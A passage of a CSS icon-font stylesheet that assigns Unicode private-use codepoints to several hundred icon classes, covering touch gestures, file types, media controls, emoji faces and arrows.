.icon-two-fingers-swipe-down4:before {
    content: "\ec2d";
}
.icon-two-fingers-swipe-right3:before {
    content: "\ec2e";
}
.icon-two-fingers-swipe-right4:before {
    content: "\ec2f";
}
.icon-two-fingers-swipe-left3:before {
    content: "\ec30";
}
.icon-two-fingers-swipe-left4:before {
    content: "\ec31";
}
.icon-one-finger-tap3:before {
    content: "\ec32";
}
.icon-one-finger-tap4:before {
    content: "\ec33";
}
.icon-one-finger-tap-hold3:before {
    content: "\ec34";
}
.icon-one-finger-tap-hold4:before {
    content: "\ec35";
}
.icon-one-finger-click3:before {
    content: "\ec36";
}
.icon-one-finger-click4:before {
    content: "\ec37";
}
.icon-one-finger-swipe-horizontally:before {
    content: "\ec38";
}
.icon-one-finger-swipe-horizontally2:before {
    content: "\ec39";
}
.icon-one-finger-swipe:before {
    content: "\ec3a";
}
.icon-one-finger-swipe2:before {
    content: "\ec3b";
}
.icon-two-fingers-double-tap:before {
    content: "\ec3c";
}
.icon-two-fingers-double-tap2:before {
    content: "\ec3d";
}
.icon-two-fingers-tap:before {
    content: "\ec3e";
}
.icon-two-fingers-tap2:before {
    content: "\ec3f";
}
.icon-one-finger-swipe-left3:before {
    content: "\ec40";
}
.icon-one-finger-swipe-left4:before {
    content: "\ec41";
}
.icon-one-finger-swipe-right3:before {
    content: "\ec42";
}
.icon-one-finger-swipe-right4:before {
    content: "\ec43";
}
.icon-one-finger-swipe-up3:before {
    content: "\ec44";
}
.icon-one-finger-swipe-up4:before {
    content: "\ec45";
}
.icon-one-finger-swipe-down3:before {
    content: "\ec46";
}
.icon-one-finger-swipe-down4:before {
    content: "\ec47";
}
.icon-file-numbers:before {
    content: "\ec48";
}
.icon-file-numbers2:before {
    content: "\ec49";
}
.icon-file-pages:before {
    content: "\ec4a";
}
.icon-file-pages2:before {
    content: "\ec4b";
}
.icon-file-app:before {
    content: "\ec4c";
}
.icon-file-app2:before {
    content: "\ec4d";
}
.icon-file-png:before {
    content: "\ec4e";
}
.icon-file-png2:before {
    content: "\ec4f";
}
.icon-file-pdf2:before {
    content: "\ec50";
}
.icon-file-pdf3:before {
    content: "\ec51";
}
.icon-file-mp3:before {
    content: "\ec52";
}
.icon-file-mp32:before {
    content: "\ec53";
}
.icon-file-mp4:before {
    content: "\ec54";
}
.icon-file-mp42:before {
    content: "\ec55";
}
.icon-file-mov:before {
    content: "\ec56";
}
.icon-file-mov2:before {
    content: "\ec57";
}
.icon-file-jpg:before {
    content: "\ec58";
}
.icon-file-jpg2:before {
    content: "\ec59";
}
.icon-file-key:before {
    content: "\ec5a";
}
.icon-file-key2:before {
    content: "\ec5b";
}
.icon-file-html:before {
    content: "\ec5c";
}
.icon-file-html2:before {
    content: "\ec5d";
}
.icon-file-css:before {
    content: "\ec5e";
}
.icon-file-css2:before {
    content: "\ec5f";
}
.icon-file-java:before {
    content: "\ec60";
}
.icon-file-java2:before {
    content: "\ec61";
}
.icon-file-psd:before {
    content: "\ec62";
}
.icon-file-psd2:before {
    content: "\ec63";
}
.icon-file-ai:before {
    content: "\ec64";
}
.icon-file-ai2:before {
    content: "\ec65";
}
.icon-file-bmp:before {
    content: "\ec66";
}
.icon-file-bmp2:before {
    content: "\ec67";
}
.icon-file-dwg:before {
    content: "\ec68";
}
.icon-file-dwg2:before {
    content: "\ec69";
}
.icon-file-eps:before {
    content: "\ec6a";
}
.icon-file-eps2:before {
    content: "\ec6b";
}
.icon-file-tiff:before {
    content: "\ec6c";
}
.icon-file-tiff2:before {
    content: "\ec6d";
}
.icon-file-ots:before {
    content: "\ec6e";
}
.icon-file-ots2:before {
    content: "\ec6f";
}
.icon-file-php:before {
    content: "\ec70";
}
.icon-file-php2:before {
    content: "\ec71";
}
.icon-file-py:before {
    content: "\ec72";
}
.icon-file-py2:before {
    content: "\ec73";
}
.icon-file-c:before {
    content: "\ec74";
}
.icon-file-c2:before {
    content: "\ec75";
}
.icon-file-sql:before {
    content: "\ec76";
}
.icon-file-sql2:before {
    content: "\ec77";
}
.icon-file-rb:before {
    content: "\ec78";
}
.icon-file-rb2:before {
    content: "\ec79";
}
.icon-file-cpp:before {
    content: "\ec7a";
}
.icon-file-cpp2:before {
    content: "\ec7b";
}
.icon-file-tga:before {
    content: "\ec7c";
}
.icon-file-tga2:before {
    content: "\ec7d";
}
.icon-file-dxf:before {
    content: "\ec7e";
}
.icon-file-dxf2:before {
    content: "\ec7f";
}
.icon-file-doc:before {
    content: "\ec80";
}
.icon-file-doc2:before {
    content: "\ec81";
}
.icon-file-odt:before {
    content: "\ec82";
}
.icon-file-odt2:before {
    content: "\ec83";
}
.icon-file-xls:before {
    content: "\ec84";
}
.icon-file-xls2:before {
    content: "\ec85";
}
.icon-file-docx:before {
    content: "\ec86";
}
.icon-file-docx2:before {
    content: "\ec87";
}
.icon-file-ppt:before {
    content: "\ec88";
}
.icon-file-ppt2:before {
    content: "\ec89";
}
.icon-file-asp:before {
    content: "\ec8a";
}
.icon-file-asp2:before {
    content: "\ec8b";
}
.icon-file-ics:before {
    content: "\ec8c";
}
.icon-file-ics2:before {
    content: "\ec8d";
}
.icon-file-dat:before {
    content: "\ec8e";
}
.icon-file-dat2:before {
    content: "\ec8f";
}
.icon-file-xml:before {
    content: "\ec90";
}
.icon-file-xml2:before {
    content: "\ec91";
}
.icon-file-yml:before {
    content: "\ec92";
}
.icon-file-yml2:before {
    content: "\ec93";
}
.icon-file-h:before {
    content: "\ec94";
}
.icon-file-h2:before {
    content: "\ec95";
}
.icon-file-exe:before {
    content: "\ec96";
}
.icon-file-exe2:before {
    content: "\ec97";
}
.icon-file-avi:before {
    content: "\ec98";
}
.icon-file-avi2:before {
    content: "\ec99";
}
.icon-file-odp:before {
    content: "\ec9a";
}
.icon-file-odp2:before {
    content: "\ec9b";
}
.icon-file-dotx:before {
    content: "\ec9c";
}
.icon-file-dotx2:before {
    content: "\ec9d";
}
.icon-file-xlsx:before {
    content: "\ec9e";
}
.icon-file-xlsx2:before {
    content: "\ec9f";
}
.icon-file-ods:before {
    content: "\eca0";
}
.icon-file-ods2:before {
    content: "\eca1";
}
.icon-file-pps:before {
    content: "\eca2";
}
.icon-file-pps2:before {
    content: "\eca3";
}
.icon-file-dot:before {
    content: "\eca4";
}
.icon-file-dot2:before {
    content: "\eca5";
}
.icon-file-txt:before {
    content: "\eca6";
}
.icon-file-txt2:before {
    content: "\eca7";
}
.icon-file-rtf:before {
    content: "\eca8";
}
.icon-file-rtf2:before {
    content: "\eca9";
}
.icon-file-m4v:before {
    content: "\ecaa";
}
.icon-file-m4v2:before {
    content: "\ecab";
}
.icon-file-flv:before {
    content: "\ecac";
}
.icon-file-flv2:before {
    content: "\ecad";
}
.icon-file-mpg:before {
    content: "\ecae";
}
.icon-file-mpg2:before {
    content: "\ecaf";
}
.icon-file-quicktime:before {
    content: "\ecb0";
}
.icon-file-quicktime2:before {
    content: "\ecb1";
}
.icon-file-mid:before {
    content: "\ecb2";
}
.icon-file-mid2:before {
    content: "\ecb3";
}
.icon-file-3gp:before {
    content: "\ecb4";
}
.icon-file-3gp2:before {
    content: "\ecb5";
}
.icon-file-aiff:before {
    content: "\ecb6";
}
.icon-file-aiff2:before {
    content: "\ecb7";
}
.icon-file-aac:before {
    content: "\ecb8";
}
.icon-file-aac2:before {
    content: "\ecb9";
}
.icon-file-wav:before {
    content: "\ecba";
}
.icon-file-wav2:before {
    content: "\ecbb";
}
.icon-file-zip2:before {
    content: "\ecbc";
}
.icon-file-zip3:before {
    content: "\ecbd";
}
.icon-file-ott:before {
    content: "\ecbe";
}
.icon-file-ott2:before {
    content: "\ecbf";
}
.icon-file-tgz:before {
    content: "\ecc0";
}
.icon-file-tgz2:before {
    content: "\ecc1";
}
.icon-file-dmg:before {
    content: "\ecc2";
}
.icon-file-dmg2:before {
    content: "\ecc3";
}
.icon-file-iso:before {
    content: "\ecc4";
}
.icon-file-iso2:before {
    content: "\ecc5";
}
.icon-file-rar:before {
    content: "\ecc6";
}
.icon-file-rar2:before {
    content: "\ecc7";
}
.icon-file-gif:before {
    content: "\ecc8";
}
.icon-file-gif2:before {
    content: "\ecc9";
}
.icon-document-file-numbers:before {
    content: "\ecca";
}
.icon-document-file-numbers2:before {
    content: "\eccb";
}
.icon-document-file-pages:before {
    content: "\eccc";
}
.icon-document-file-pages2:before {
    content: "\eccd";
}
.icon-document-file-app:before {
    content: "\ecce";
}
.icon-document-file-app2:before {
    content: "\eccf";
}
.icon-document-file-png:before {
    content: "\ecd0";
}
.icon-document-file-png2:before {
    content: "\ecd1";
}
.icon-document-file-pdf:before {
    content: "\ecd2";
}
.icon-document-file-pdf2:before {
    content: "\ecd3";
}
.icon-document-file-mp3:before {
    content: "\ecd4";
}
.icon-document-file-mp32:before {
    content: "\ecd5";
}
.icon-document-file-mp4:before {
    content: "\ecd6";
}
.icon-document-file-mp42:before {
    content: "\ecd7";
}
.icon-document-file-mov:before {
    content: "\ecd8";
}
.icon-document-file-mov2:before {
    content: "\ecd9";
}
.icon-document-file-jpg:before {
    content: "\ecda";
}
.icon-document-file-jpg2:before {
    content: "\ecdb";
}
.icon-document-file-key:before {
    content: "\ecdc";
}
.icon-document-file-key2:before {
    content: "\ecdd";
}
.icon-document-file-html:before {
    content: "\ecde";
}
.icon-document-file-html2:before {
    content: "\ecdf";
}
.icon-document-file-css:before {
    content: "\ece0";
}
.icon-document-file-css2:before {
    content: "\ece1";
}
.icon-document-file-java:before {
    content: "\ece2";
}
.icon-document-file-java2:before {
    content: "\ece3";
}
.icon-document-file-psd:before {
    content: "\ece4";
}
.icon-document-file-psd2:before {
    content: "\ece5";
}
.icon-document-file-ai:before {
    content: "\ece6";
}
.icon-document-file-ai2:before {
    content: "\ece7";
}
.icon-document-file-bmp:before {
    content: "\ece8";
}
.icon-document-file-bmp2:before {
    content: "\ece9";
}
.icon-document-file-dwg:before {
    content: "\ecea";
}
.icon-document-file-dwg2:before {
    content: "\eceb";
}
.icon-document-file-eps:before {
    content: "\ecec";
}
.icon-document-file-eps2:before {
    content: "\eced";
}
.icon-document-file-tiff:before {
    content: "\ecee";
}
.icon-document-file-tiff2:before {
    content: "\ecef";
}
.icon-document-file-ots:before {
    content: "\ecf0";
}
.icon-document-file-ots2:before {
    content: "\ecf1";
}
.icon-document-file-php:before {
    content: "\ecf2";
}
.icon-document-file-php2:before {
    content: "\ecf3";
}
.icon-document-file-py:before {
    content: "\ecf4";
}
.icon-document-file-py2:before {
    content: "\ecf5";
}
.icon-document-file-c:before {
    content: "\ecf6";
}
.icon-document-file-c2:before {
    content: "\ecf7";
}
.icon-document-file-sql:before {
    content: "\ecf8";
}
.icon-document-file-sql2:before {
    content: "\ecf9";
}
.icon-document-file-rb:before {
    content: "\ecfa";
}
.icon-document-file-rb2:before {
    content: "\ecfb";
}
.icon-document-file-cpp:before {
    content: "\ecfc";
}
.icon-document-file-cpp2:before {
    content: "\ecfd";
}
.icon-document-file-tga:before {
    content: "\ecfe";
}
.icon-document-file-tga2:before {
    content: "\ecff";
}
.icon-document-file-dxf:before {
    content: "\ed00";
}
.icon-document-file-dxf2:before {
    content: "\ed01";
}
.icon-document-file-doc:before {
    content: "\ed02";
}
.icon-document-file-doc2:before {
    content: "\ed03";
}
.icon-document-file-odt:before {
    content: "\ed04";
}
.icon-document-file-odt2:before {
    content: "\ed05";
}
.icon-document-file-xls:before {
    content: "\ed06";
}
.icon-document-file-xls2:before {
    content: "\ed07";
}
.icon-document-file-docx:before {
    content: "\ed08";
}
.icon-document-file-docx2:before {
    content: "\ed09";
}
.icon-document-file-ppt:before {
    content: "\ed0a";
}
.icon-document-file-ppt2:before {
    content: "\ed0b";
}
.icon-document-file-asp:before {
    content: "\ed0c";
}
.icon-document-file-asp2:before {
    content: "\ed0d";
}
.icon-document-file-ics:before {
    content: "\ed0e";
}
.icon-document-file-ics2:before {
    content: "\ed0f";
}
.icon-document-file-dat:before {
    content: "\ed10";
}
.icon-document-file-dat2:before {
    content: "\ed11";
}
.icon-document-file-xml:before {
    content: "\ed12";
}
.icon-document-file-xml2:before {
    content: "\ed13";
}
.icon-document-file-yml:before {
    content: "\ed14";
}
.icon-document-file-yml2:before {
    content: "\ed15";
}
.icon-document-file-h:before {
    content: "\ed16";
}
.icon-document-file-h2:before {
    content: "\ed17";
}
.icon-document-file-exe:before {
    content: "\ed18";
}
.icon-document-file-exe2:before {
    content: "\ed19";
}
.icon-document-file-avi:before {
    content: "\ed1a";
}
.icon-document-file-avi2:before {
    content: "\ed1b";
}
.icon-document-file-odp:before {
    content: "\ed1c";
}
.icon-document-file-odp2:before {
    content: "\ed1d";
}
.icon-document-file-dotx:before {
    content: "\ed1e";
}
.icon-document-file-dotx2:before {
    content: "\ed1f";
}
.icon-document-file-xlsx:before {
    content: "\ed20";
}
.icon-document-file-xlsx2:before {
    content: "\ed21";
}
.icon-document-file-ods:before {
    content: "\ed22";
}
.icon-document-file-ods2:before {
    content: "\ed23";
}
.icon-document-file-pps:before {
    content: "\ed24";
}
.icon-document-file-pps2:before {
    content: "\ed25";
}
.icon-document-file-dot:before {
    content: "\ed26";
}
.icon-document-file-dot2:before {
    content: "\ed27";
}
.icon-document-file-txt:before {
    content: "\ed28";
}
.icon-document-file-txt2:before {
    content: "\ed29";
}
.icon-document-file-rtf:before {
    content: "\ed2a";
}
.icon-document-file-rtf2:before {
    content: "\ed2b";
}
.icon-document-file-m4v:before {
    content: "\ed2c";
}
.icon-document-file-m4v2:before {
    content: "\ed2d";
}
.icon-document-file-flv:before {
    content: "\ed2e";
}
.icon-document-file-flv2:before {
    content: "\ed2f";
}
.icon-document-file-mpg:before {
    content: "\ed30";
}
.icon-document-file-mpg2:before {
    content: "\ed31";
}
.icon-document-file-qt:before {
    content: "\ed32";
}
.icon-document-file-qt2:before {
    content: "\ed33";
}
.icon-document-file-mid:before {
    content: "\ed34";
}
.icon-document-file-mid2:before {
    content: "\ed35";
}
.icon-document-file-3gp:before {
    content: "\ed36";
}
.icon-document-file-3gp2:before {
    content: "\ed37";
}
.icon-document-file-aiff:before {
    content: "\ed38";
}
.icon-document-file-aiff2:before {
    content: "\ed39";
}
.icon-document-file-aac:before {
    content: "\ed3a";
}
.icon-document-file-aac2:before {
    content: "\ed3b";
}
.icon-document-file-wav:before {
    content: "\ed3c";
}
.icon-document-file-wav2:before {
    content: "\ed3d";
}
.icon-document-file-zip:before {
    content: "\ed3e";
}
.icon-document-file-zip2:before {
    content: "\ed3f";
}
.icon-document-file-ott:before {
    content: "\ed40";
}
.icon-document-file-ott2:before {
    content: "\ed41";
}
.icon-document-file-tgz:before {
    content: "\ed42";
}
.icon-document-file-tgz2:before {
    content: "\ed43";
}
.icon-document-file-dmg:before {
    content: "\ed44";
}
.icon-document-file-dmg2:before {
    content: "\ed45";
}
.icon-document-file-iso:before {
    content: "\ed46";
}
.icon-document-file-iso2:before {
    content: "\ed47";
}
.icon-document-file-rar:before {
    content: "\ed48";
}
.icon-document-file-rar2:before {
    content: "\ed49";
}
.icon-document-file-gif:before {
    content: "\ed4a";
}
.icon-document-file-gif2:before {
    content: "\ed4b";
}
.icon-home:before {
    content: "\ed4c";
}
.icon-home2:before {
    content: "\ed4d";
}
.icon-home3:before {
    content: "\ed4e";
}
.icon-office:before {
    content: "\ed4f";
}
.icon-newspaper:before {
    content: "\ed50";
}
.icon-pencil:before {
    content: "\ed51";
}
.icon-pencil2:before {
    content: "\ed52";
}
.icon-quill:before {
    content: "\ed53";
}
.icon-pen:before {
    content: "\ed54";
}
.icon-blog:before {
    content: "\ed55";
}
.icon-eyedropper:before {
    content: "\ed56";
}
.icon-droplet:before {
    content: "\ed57";
}
.icon-paint-format:before {
    content: "\ed58";
}
.icon-image:before {
    content: "\ed59";
}
.icon-images:before {
    content: "\ed5a";
}
.icon-camera:before {
    content: "\ed5b";
}
.icon-headphones:before {
    content: "\ed5c";
}
.icon-music:before {
    content: "\ed5d";
}
.icon-play:before {
    content: "\ed5e";
}
.icon-film:before {
    content: "\ed5f";
}
.icon-video-camera:before {
    content: "\ed60";
}
.icon-dice:before {
    content: "\ed61";
}
.icon-pacman:before {
    content: "\ed62";
}
.icon-spades:before {
    content: "\ed63";
}
.icon-clubs:before {
    content: "\ed64";
}
.icon-diamonds:before {
    content: "\ed65";
}
.icon-bullhorn:before {
    content: "\ed66";
}
.icon-connection:before {
    content: "\ed67";
}
.icon-podcast:before {
    content: "\ed68";
}
.icon-feed:before {
    content: "\ed69";
}
.icon-mic:before {
    content: "\ed6a";
}
.icon-book:before {
    content: "\ed6b";
}
.icon-books:before {
    content: "\ed6c";
}
.icon-library:before {
    content: "\ed6d";
}
.icon-file-text:before {
    content: "\ed6e";
}
.icon-profile:before {
    content: "\ed6f";
}
.icon-file-empty:before {
    content: "\ed70";
}
.icon-files-empty:before {
    content: "\ed71";
}
.icon-file-text2:before {
    content: "\ed72";
}
.icon-file-picture:before {
    content: "\ed73";
}
.icon-file-music:before {
    content: "\ed74";
}
.icon-file-play:before {
    content: "\ed75";
}
.icon-file-video:before {
    content: "\ed76";
}
.icon-file-zip:before {
    content: "\ed77";
}
.icon-copy:before {
    content: "\ed78";
}
.icon-paste:before {
    content: "\ed79";
}
.icon-stack:before {
    content: "\ed7a";
}
.icon-folder:before {
    content: "\ed7b";
}
.icon-folder-open:before {
    content: "\ed7c";
}
.icon-folder-plus:before {
    content: "\ed7d";
}
.icon-folder-minus:before {
    content: "\ed7e";
}
.icon-folder-download:before {
    content: "\ed7f";
}
.icon-folder-upload:before {
    content: "\ed80";
}
.icon-price-tag:before {
    content: "\ed81";
}
.icon-price-tags:before {
    content: "\ed82";
}
.icon-barcode:before {
    content: "\ed83";
}
.icon-qrcode:before {
    content: "\ed84";
}
.icon-ticket:before {
    content: "\ed85";
}
.icon-cart:before {
    content: "\ed86";
}
.icon-coin-dollar:before {
    content: "\ed87";
}
.icon-coin-euro:before {
    content: "\ed88";
}
.icon-coin-pound:before {
    content: "\ed89";
}
.icon-coin-yen:before {
    content: "\ed8a";
}
.icon-credit-card:before {
    content: "\ed8b";
}
.icon-calculator:before {
    content: "\ed8c";
}
.icon-lifebuoy:before {
    content: "\ed8d";
}
.icon-phone:before {
    content: "\ed8e";
}
.icon-phone-hang-up:before {
    content: "\ed8f";
}
.icon-address-book:before {
    content: "\ed90";
}
.icon-envelop:before {
    content: "\ed91";
}
.icon-pushpin:before {
    content: "\ed92";
}
.icon-location:before {
    content: "\ed93";
}
.icon-location2:before {
    content: "\ed94";
}
.icon-compass:before {
    content: "\ed95";
}
.icon-compass2:before {
    content: "\ed96";
}
.icon-map:before {
    content: "\ed97";
}
.icon-map2:before {
    content: "\ed98";
}
.icon-history:before {
    content: "\ed99";
}
.icon-clock:before {
    content: "\ed9a";
}
.icon-clock2:before {
    content: "\ed9b";
}
.icon-alarm:before {
    content: "\ed9c";
}
.icon-bell:before {
    content: "\ed9d";
}
.icon-stopwatch:before {
    content: "\ed9e";
}
.icon-calendar:before {
    content: "\ed9f";
}
.icon-printer:before {
    content: "\eda0";
}
.icon-keyboard:before {
    content: "\eda1";
}
.icon-display:before {
    content: "\eda2";
}
.icon-laptop:before {
    content: "\eda3";
}
.icon-mobile:before {
    content: "\eda4";
}
.icon-mobile2:before {
    content: "\eda5";
}
.icon-tablet:before {
    content: "\eda6";
}
.icon-tv:before {
    content: "\eda7";
}
.icon-drawer:before {
    content: "\eda8";
}
.icon-drawer2:before {
    content: "\eda9";
}
.icon-box-add:before {
    content: "\edaa";
}
.icon-box-remove:before {
    content: "\edab";
}
.icon-download:before {
    content: "\edac";
}
.icon-upload:before {
    content: "\edad";
}
.icon-floppy-disk:before {
    content: "\edae";
}
.icon-drive:before {
    content: "\edaf";
}
.icon-database:before {
    content: "\edb0";
}
.icon-undo:before {
    content: "\edb1";
}
.icon-redo:before {
    content: "\edb2";
}
.icon-undo2:before {
    content: "\edb3";
}
.icon-redo2:before {
    content: "\edb4";
}
.icon-forward:before {
    content: "\edb5";
}
.icon-reply:before {
    content: "\edb6";
}
.icon-bubble:before {
    content: "\edb7";
}
.icon-bubbles:before {
    content: "\edb8";
}
.icon-bubbles2:before {
    content: "\edb9";
}
.icon-bubble2:before {
    content: "\edba";
}
.icon-bubbles3:before {
    content: "\edbb";
}
.icon-bubbles4:before {
    content: "\edbc";
}
.icon-user:before {
    content: "\edbd";
}
.icon-users:before {
    content: "\edbe";
}
.icon-user-plus:before {
    content: "\edbf";
}
.icon-user-minus:before {
    content: "\edc0";
}
.icon-user-check:before {
    content: "\edc1";
}
.icon-user-tie:before {
    content: "\edc2";
}
.icon-quotes-left:before {
    content: "\edc3";
}
.icon-quotes-right:before {
    content: "\edc4";
}
.icon-hour-glass:before {
    content: "\edc5";
}
.icon-spinner:before {
    content: "\edc6";
}
.icon-spinner2:before {
    content: "\edc7";
}
.icon-spinner3:before {
    content: "\edc8";
}
.icon-spinner4:before {
    content: "\edc9";
}
.icon-spinner5:before {
    content: "\edca";
}
.icon-spinner6:before {
    content: "\edcb";
}
.icon-spinner7:before {
    content: "\edcc";
}
.icon-spinner8:before {
    content: "\edcd";
}
.icon-spinner9:before {
    content: "\edce";
}
.icon-spinner10:before {
    content: "\edcf";
}
.icon-spinner11:before {
    content: "\edd0";
}
.icon-binoculars:before {
    content: "\edd1";
}
.icon-search:before {
    content: "\edd2";
}
.icon-zoom-in:before {
    content: "\edd3";
}
.icon-zoom-out:before {
    content: "\edd4";
}
.icon-enlarge:before {
    content: "\edd5";
}
.icon-shrink:before {
    content: "\edd6";
}
.icon-enlarge2:before {
    content: "\edd7";
}
.icon-shrink2:before {
    content: "\edd8";
}
.icon-key:before {
    content: "\edd9";
}
.icon-key2:before {
    content: "\edda";
}
.icon-lock:before {
    content: "\eddb";
}
.icon-unlocked:before {
    content: "\eddc";
}
.icon-wrench:before {
    content: "\eddd";
}
.icon-equalizer:before {
    content: "\edde";
}
.icon-equalizer2:before {
    content: "\eddf";
}
.icon-cog:before {
    content: "\ede0";
}
.icon-cogs:before {
    content: "\ede1";
}
.icon-hammer:before {
    content: "\ede2";
}
.icon-magic-wand:before {
    content: "\ede3";
}
.icon-aid-kit:before {
    content: "\ede4";
}
.icon-bug:before {
    content: "\ede5";
}
.icon-pie-chart:before {
    content: "\ede6";
}
.icon-stats-dots:before {
    content: "\ede7";
}
.icon-stats-bars:before {
    content: "\ede8";
}
.icon-stats-bars2:before {
    content: "\ede9";
}
.icon-trophy:before {
    content: "\edea";
}
.icon-gift:before {
    content: "\edeb";
}
.icon-glass:before {
    content: "\edec";
}
.icon-glass2:before {
    content: "\eded";
}
.icon-mug:before {
    content: "\edee";
}
.icon-spoon-knife:before {
    content: "\edef";
}
.icon-leaf:before {
    content: "\edf0";
}
.icon-rocket:before {
    content: "\edf1";
}
.icon-meter:before {
    content: "\edf2";
}
.icon-meter2:before {
    content: "\edf3";
}
.icon-hammer2:before {
    content: "\edf4";
}
.icon-fire:before {
    content: "\edf5";
}
.icon-lab:before {
    content: "\edf6";
}
.icon-magnet:before {
    content: "\edf7";
}
.icon-bin:before {
    content: "\edf8";
}
.icon-bin2:before {
    content: "\edf9";
}
.icon-briefcase:before {
    content: "\edfa";
}
.icon-airplane:before {
    content: "\edfb";
}
.icon-truck:before {
    content: "\edfc";
}
.icon-road:before {
    content: "\edfd";
}
.icon-accessibility:before {
    content: "\edfe";
}
.icon-target:before {
    content: "\edff";
}
.icon-shield:before {
    content: "\ee00";
}
.icon-power:before {
    content: "\ee01";
}
.icon-switch:before {
    content: "\ee02";
}
.icon-power-cord:before {
    content: "\ee03";
}
.icon-clipboard:before {
    content: "\ee04";
}
.icon-list-numbered:before {
    content: "\ee05";
}
.icon-list:before {
    content: "\ee06";
}
.icon-list2:before {
    content: "\ee07";
}
.icon-tree:before {
    content: "\ee08";
}
.icon-menu:before {
    content: "\ee09";
}
.icon-menu2:before {
    content: "\ee0a";
}
.icon-menu3:before {
    content: "\ee0b";
}
.icon-menu4:before {
    content: "\ee0c";
}
.icon-cloud:before {
    content: "\ee0d";
}
.icon-cloud-download:before {
    content: "\ee0e";
}
.icon-cloud-upload:before {
    content: "\ee0f";
}
.icon-cloud-check:before {
    content: "\ee10";
}
.icon-download2:before {
    content: "\ee11";
}
.icon-upload2:before {
    content: "\ee12";
}
.icon-download3:before {
    content: "\ee13";
}
.icon-upload3:before {
    content: "\ee14";
}
.icon-sphere:before {
    content: "\ee15";
}
.icon-earth:before {
    content: "\ee16";
}
.icon-link:before {
    content: "\ee17";
}
.icon-flag:before {
    content: "\ee18";
}
.icon-attachment:before {

    content: "\ee19";
}
.icon-eye:before {
    content: "\ee1a";
}
.icon-eye-plus:before {
    content: "\ee1b";
}
.icon-eye-minus:before {
    content: "\ee1c";
}
.icon-eye-blocked:before {
    content: "\ee1d";
}
.icon-bookmark:before {
    content: "\ee1e";
}
.icon-bookmarks:before {
    content: "\ee1f";
}
.icon-sun:before {
    content: "\ee20";
}
.icon-contrast:before {
    content: "\ee21";
}
.icon-brightness-contrast:before {
    content: "\ee22";
}
.icon-star-empty:before {
    content: "\ee23";
}
.icon-star-half:before {
    content: "\ee24";
}
.icon-star-full:before {
    content: "\ee25";
}
.icon-heart:before {
    content: "\ee26";
}
.icon-heart-broken:before {
    content: "\ee27";
}
.icon-man:before {
    content: "\ee28";
}
.icon-woman:before {
    content: "\ee29";
}
.icon-man-woman:before {
    content: "\ee2a";
}
.icon-happy:before {
    content: "\ee2b";
}
.icon-happy2:before {
    content: "\ee2c";
}
.icon-smile:before {
    content: "\ee2d";
}
.icon-smile2:before {
    content: "\ee2e";
}
.icon-tongue:before {
    content: "\ee2f";
}
.icon-tongue2:before {
    content: "\ee30";
}
.icon-sad:before {
    content: "\ee31";
}
.icon-sad2:before {
    content: "\ee32";
}
.icon-wink:before {
    content: "\ee33";
}
.icon-wink2:before {
    content: "\ee34";
}
.icon-grin:before {
    content: "\ee35";
}
.icon-grin2:before {
    content: "\ee36";
}
.icon-cool:before {
    content: "\ee37";
}
.icon-cool2:before {
    content: "\ee38";
}
.icon-angry:before {
    content: "\ee39";
}
.icon-angry2:before {
    content: "\ee3a";
}
.icon-evil:before {
    content: "\ee3b";
}
.icon-evil2:before {
    content: "\ee3c";
}
.icon-shocked:before {
    content: "\ee3d";
}
.icon-shocked2:before {
    content: "\ee3e";
}
.icon-baffled:before {
    content: "\ee3f";
}
.icon-baffled2:before {
    content: "\ee40";
}
.icon-confused:before {
    content: "\ee41";
}
.icon-confused2:before {
    content: "\ee42";
}
.icon-neutral:before {
    content: "\ee43";
}
.icon-neutral2:before {
    content: "\ee44";
}
.icon-hipster:before {
    content: "\ee45";
}
.icon-hipster2:before {
    content: "\ee46";
}
.icon-wondering:before {
    content: "\ee47";
}
.icon-wondering2:before {
    content: "\ee48";
}
.icon-sleepy:before {
    content: "\ee49";
}
.icon-sleepy2:before {
    content: "\ee4a";
}
.icon-frustrated:before {
    content: "\ee4b";
}
.icon-frustrated2:before {
    content: "\ee4c";
}
.icon-crying:before {
    content: "\ee4d";
}
.icon-crying2:before {
    content: "\ee4e";
}
.icon-point-up:before {
    content: "\ee4f";
}
.icon-point-right:before {
    content: "\ee50";
}
.icon-point-down:before {
    content: "\ee51";
}
.icon-point-left:before {
    content: "\ee52";
}
.icon-warning:before {
    content: "\ee53";
}
.icon-notification:before {
    content: "\ee54";
}
.icon-question:before {
    content: "\ee55";
}
.icon-plus:before {
    content: "\ee56";
}
.icon-minus:before {
    content: "\ee57";
}
.icon-info:before {
    content: "\ee58";
}
.icon-cancel-circle:before {
    content: "\ee59";
}
.icon-blocked:before {
    content: "\ee5a";
}
.icon-cross:before {
    content: "\ee5b";
}
.icon-checkmark:before {
    content: "\ee5c";
}
.icon-checkmark2:before {
    content: "\ee5d";
}
.icon-spell-check:before {
    content: "\ee5e";
}
.icon-enter:before {
    content: "\ee5f";
}
.icon-exit:before {
    content: "\ee60";
}
.icon-play2:before {
    content: "\ee61";
}
.icon-pause:before {
    content: "\ee62";
}
.icon-stop:before {
    content: "\ee63";
}
.icon-previous:before {
    content: "\ee64";
}
.icon-next:before {
    content: "\ee65";
}
.icon-backward:before {
    content: "\ee66";
}
.icon-forward2:before {
    content: "\ee67";
}
.icon-play3:before {
    content: "\ee68";
}
.icon-pause2:before {
    content: "\ee69";
}
.icon-stop2:before {
    content: "\ee6a";
}
.icon-backward2:before {
    content: "\ee6b";
}
.icon-forward3:before {
    content: "\ee6c";
}
.icon-first:before {
    content: "\ee6d";
}
.icon-last:before {
    content: "\ee6e";
}
.icon-previous2:before {
    content: "\ee6f";
}
.icon-next2:before {
    content: "\ee70";
}
.icon-eject:before {
    content: "\ee71";
}
.icon-volume-high:before {
    content: "\ee72";
}
.icon-volume-medium:before {
    content: "\ee73";
}
.icon-volume-low:before {
    content: "\ee74";
}
.icon-volume-mute:before {
    content: "\ee75";
}
.icon-volume-mute2:before {
    content: "\ee76";
}
.icon-volume-increase:before {
    content: "\ee77";
}
.icon-volume-decrease:before {
    content: "\ee78";
}
.icon-loop:before {
    content: "\ee79";
}
.icon-loop2:before {
    content: "\ee7a";
}
.icon-infinite:before {
    content: "\ee7b";
}
.icon-shuffle:before {
    content: "\ee7c";
}
.icon-arrow-up-left:before {
    content: "\ee7d";
}
.icon-arrow-up:before {
    content: "\ee7e";
}
.icon-arrow-up-right:before {
    content: "\ee7f";
}
.icon-arrow-right:before {
    content: "\ee80";
}
.icon-arrow-down-right:before {
    content: "\ee81";
}
.icon-arrow-down:before {
    content: "\ee82";
}
.icon-arrow-down-left:before {
    content: "\ee83";
}
.icon-arrow-left:before {
    content: "\ee84";
}
.icon-arrow-up-left2:before {
    content: "\ee85";
}
.icon-arrow-up2:before {
    content: "\ee86";
}
